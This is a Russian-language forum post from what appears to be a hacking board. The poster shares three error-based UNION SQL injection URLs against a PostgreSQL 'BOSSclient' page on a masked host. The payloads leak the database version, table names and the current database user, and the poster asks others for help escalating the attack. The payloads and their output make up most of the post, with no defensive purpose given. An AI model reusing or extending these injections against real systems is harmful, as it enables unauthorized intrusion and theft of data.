Показать сообщение отдельно

  #7  
Старый 15.02.2012, 20:26
dcspirit
Новичок
Регистрация: 13.07.2011
Сообщений: 10
Провел на форуме:
2241

Репутация: 0
По умолчанию

Вот еще методом проб и ошибок-)

http://ххххххххх/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120215 &isrv=84&id=155348&idservice=-1+union+select+null,null,null,null,cast(version()+ as+double+precision),null,null,null--

Выдает нам версию - PostgreSQL 8.2.13 on amd64-portbld-freebsd7.2, compiled by GCC cc (GCC) 4.2.1 20070719 [FreeBSD]

http://ххххххххх/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120215 &isrv=84&id=155348&idservice=-1+union+select+null,null,null,null,cast(TABLE_NAME +as+double+precision),null,null,null+from+INFORMAT ION_SCHEMA.TABLES+LIMIT+1+OFFSET+1--

Выдает нам имя таблицы 1 - "views" . Далее, наращивая OFFSET выдает эту же таблицу (хотя таблиц точнодольше должно быть!)

http://хххххххххх/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120215 &isrv=84&id=155348&idservice=-1+union+select+null,null,null,null,cast(cast(user+ as+text)+as+double+precision),null,null,null+from+ INFORMATION_SCHEMA.TABLES+LIMIT+1+OFFSET+1--

Так узнаем свои права (по ходу дела, как я понял -) )

- "nobody"

Т.е. прав нет считай?

Подскажите, что можно сделать в данном случае...
 
Ответить с цитированием